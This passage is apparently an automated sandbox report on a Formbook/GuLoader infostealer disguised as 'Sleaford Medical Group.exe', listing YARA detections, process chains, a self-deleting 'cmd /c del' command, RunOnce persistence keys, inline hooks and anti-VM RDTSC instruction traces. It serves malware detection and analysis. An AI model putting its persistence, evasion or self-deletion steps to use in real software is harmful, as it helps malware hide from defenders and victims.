      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AD5E0
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4622AE
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E462B28
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CEBB0
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45DBD2
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4503DA
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451002
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46E824
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB090
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4628EC
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4620A8
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39F900
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAB40
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038803DA
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388DBD2
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03892B28
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FEBB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038922AE
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387FA2B
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CF900
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038920A8
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038928EC
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03881002
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0389E824
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB090
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0389DFCE
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03891FF1
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E6E30
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03892EF7
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388D616
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038925DD
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C0D20
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03892D07
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DD5E0
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03891D55
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2581
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D841F
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388D466
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDE23F
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDD1F5
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC9E40
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDE61C
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDCFB6
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC2FB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDD5F1
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC2D90
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 037CB150 appears 54 times
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: String function: 1E39B150 appears 45 times
      Source: Sleaford Medical Group.exe, 00000000.00000002.458812048.0000000000419000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSEMICALCINED.exe vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.584862109.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000000.457893775.0000000000419000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSEMICALCINED.exe vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.587041727.000000001E61F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000003.549281302.00000000008CD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.584793888.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exeBinary or memory string: OriginalFilenameSEMICALCINED.exe vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000002.731169512.000000000333D000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000001C.00000002.736741312.0000000003CCF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/2@3/2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4880:120:WilError_01
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2124B0C9C8814512.TMPJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs'
      Source: Sleaford Medical Group.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Sleaford Medical Group.exeVirustotal: Detection: 47%
      Source: Sleaford Medical Group.exeReversingLabs: Detection: 10%
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile read: C:\Users\user\Desktop\Sleaford Medical Group.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs'
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Sleaford Medical Group.exe, 00000016.00000003.497880207.000000001E1D0000.00000004.00000001.sdmp, help.exe, 0000001C.00000002.734476074.00000000038BF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Sleaford Medical Group.exe, help.exe
      Source: Binary string: help.pdbGCTL source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: help.pdb source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Sleaford Medical Group.exe PID: 5356, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: oversad.exe PID: 6316, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Sleaford Medical Group.exe PID: 5356, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: oversad.exe PID: 6316, type: MEMORY
      Source: Sleaford Medical Group.exeStatic PE information: real checksum: 0x1de61 should be: 0x2872b
      Source: oversad.exe.22.drStatic PE information: real checksum: 0x1de61 should be: 0x2872b
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040566B push 80B1BCC2h; iretd
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040C272 push eax; retf 0040h
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_00402603 push 0000001Ch; ret
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040B41D push edi; iretd
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_00402434 push esp; iretd
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040583C push eax; ret
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040BCC5 push edi; iretd
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040C28C pushad ; retf 0040h
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040857A push edi; ret
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040C39C push 7C00700Ch; retf
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3ED0D1 push ecx; ret
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00563DA9 push 0000002Dh; retn 0008h
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0381D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED6AAA push ebx; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ECE3A1 push edi; retf
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDE35B push esi; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED68DE push 79CB813Ch; retf
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED6999 push edx; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDCEC5 push eax; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ECDF98 push cs; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDCF7C push eax; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDCF1B push eax; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDCF12 push eax; ret
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC6DA1 push ebp; retf
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeJump to dropped file

      Boot Survival:

      barindex
      Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbsJump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbsJump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6Jump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6Jump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6Jump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6Jump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEB
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00563AC4 InternetOpenA,InternetOpenUrlA,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562CA9
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562D5A
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562D02
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_005629FB
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562993
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562A7B
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056661B
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562AD1
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00563AC7 InternetOpenA,InternetOpenUrlA,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562AE5
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562AB2
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562B67
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00563B11 InternetOpenUrlA,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562B1D
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00562BE4
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 000000000042616B second address: 00000000004253F5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, 00000539h 0x0000000f push esi 0x00000010 mov esi, A893C8D1h 0x00000015 cmp esi, A893C8D1h 0x0000001b jne 00007F08D0B0C1FBh 0x00000021 pop esi 0x00000022 mov ecx, dword ptr [ebp+1Ch] 0x00000025 mov edx, 8802EDACh 0x0000002a call 00007F08D0B10EABh 0x0000002f jmp 00007F08D0B11CCAh 0x00000031 nop 0x00000032 push esi 0x00000033 push edx 0x00000034 jmp 00007F08D0B11CCAh 0x00000036 test ch, ch 0x00000038 push ecx 0x00000039 cmp eax, 00000539h 0x0000003e jne 00007F08D0B11E08h 0x00000044 jmp 00007F08D0B11CCAh 0x00000046 pushad 0x00000047 mov edx, 000000C2h 0x0000004c rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000425EF7 second address: 0000000000425EF7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F08D0937E38h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F08D0937E4Ah 0x0000001f nop 0x00000020 cmp al, al 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F08D0937DFBh 0x00000033 cmp cl, cl 0x00000035 cmp ah, bh 0x00000037 call 00007F08D0937E8Fh 0x0000003c call 00007F08D0937E48h 0x00000041 lfence 0x00000044 mov edx, dword ptr [7FFE0014h] 0x0000004a lfence 0x0000004d ret 0x0000004e mov esi, edx 0x00000050 pushad 0x00000051 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000424202 second address: 0000000000424202 instructions:
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000560F5E second address: 0000000000560F5E instructions:
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000565BB0 second address: 00000000005639A3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a retn 0010h 0x0000000d cmp edx, edx 0x0000000f push dword ptr [ebp+000000B4h] 0x00000015 pop dword ptr [ebp+00000134h] 0x0000001b jmp 00007F08D0B11CCAh 0x0000001d jmp 00007F08D0B11D00h 0x0000001f push dword ptr [ebp+68h] 0x00000022 push dword ptr [ebp+00000134h] 0x00000028 call 00007F08D0B142D5h 0x0000002d pushad 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 00000000005639A3 second address: 00000000005639A3 instructions:
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000563C6D second address: 0000000000563CC2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push esi 0x0000000b mov esi, CDC9E0AFh 0x00000010 cmp esi, CDC9E0AFh 0x00000016 jne 00007F08D0B0E6FEh 0x0000001c pop esi 0x0000001d mov eax, ebp 0x0000001f add eax, 000000F0h 0x00000024 jmp 00007F08D0B11CCAh 0x00000026 test cx, cx 0x00000029 mov ebx, dword ptr [ebp+000000E4h] 0x0000002f cmp edx, edx 0x00000031 mov ecx, dword ptr [ebp+000000F4h] 0x00000037 pushad 0x00000038 mov ecx, 000000EBh 0x0000003d rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Sleaford Medical Group.exe, oversad.exe, 0000001A.00000002.730357636.0000000000420000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000401C79 second address: 0000000000401C79 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 2Dh 0x00000005 cmp ebx, 06h 0x00000008 cmp edi, 02EAFF40h 0x0000000e movd mm1, ebx 0x00000011 movd mm1, ebx 0x00000014 paddusw xmm0, xmm3 0x00000018 fdivp st(6), st(0) 0x0000001a jmp 00007F08D0937E89h 0x0000001c movd mm1, ebx 0x0000001f movd mm1, ebx 0x00000022 jne 00007F08D0937D4Fh 0x00000028 inc edi 0x00000029 pslld mm5, 09h 0x0000002d fsubp st(1), st(0) 0x0000002f jmp 00007F08D0937E89h 0x00000031 cmp eax, 1Dh 0x00000034 cmp eax, 000000A3h 0x00000039 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 000000000042616B second address: 00000000004253F5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, 00000539h 0x0000000f push esi 0x00000010 mov esi, A893C8D1h 0x00000015 cmp esi, A893C8D1h 0x0000001b jne 00007F08D0B0C1FBh 0x00000021 pop esi 0x00000022 mov ecx, dword ptr [ebp+1Ch] 0x00000025 mov edx, 8802EDACh 0x0000002a call 00007F08D0B10EABh 0x0000002f jmp 00007F08D0B11CCAh 0x00000031 nop 0x00000032 push esi 0x00000033 push edx 0x00000034 jmp 00007F08D0B11CCAh 0x00000036 test ch, ch 0x00000038 push ecx 0x00000039 cmp eax, 00000539h 0x0000003e jne 00007F08D0B11E08h 0x00000044 jmp 00007F08D0B11CCAh 0x00000046 pushad 0x00000047 mov edx, 000000C2h 0x0000004c rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000425EF7 second address: 0000000000425EF7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F08D0937E38h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F08D0937E4Ah 0x0000001f nop 0x00000020 cmp al, al 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F08D0937DFBh 0x00000033 cmp cl, cl 0x00000035 cmp ah, bh 0x00000037 call 00007F08D0937E8Fh 0x0000003c call 00007F08D0937E48h 0x00000041 lfence 0x00000044 mov edx, dword ptr [7FFE0014h] 0x0000004a lfence 0x0000004d ret 0x0000004e mov esi, edx 0x00000050 pushad 0x00000051 rdtsc
